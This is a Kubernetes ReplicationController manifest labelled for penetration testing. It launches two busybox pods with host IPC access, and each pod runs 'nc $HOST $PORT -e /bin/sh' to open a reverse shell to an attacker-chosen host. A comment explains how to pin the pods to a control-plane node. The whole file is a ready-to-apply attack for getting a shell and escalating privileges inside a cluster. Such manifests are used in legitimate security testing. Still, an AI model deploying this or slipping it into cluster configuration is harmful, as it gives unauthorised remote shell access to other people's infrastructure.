apiVersion: v1
kind: ReplicationController
metadata:
  name: hostipc-revshell-replicationcontroller
  labels:
    app: pentest
    type: replicationcontroller
spec:
  replicas: 2
  selector:
    app: pentest
    type: replicationcontroller
  template:
    metadata:
      labels:
        app: pentest
        type: replicationcontroller
    spec:
      hostIPC: true
      containers:
      - name: hostipc
        image: busybox
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "nc $HOST $PORT  -e /bin/sh;" ]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

      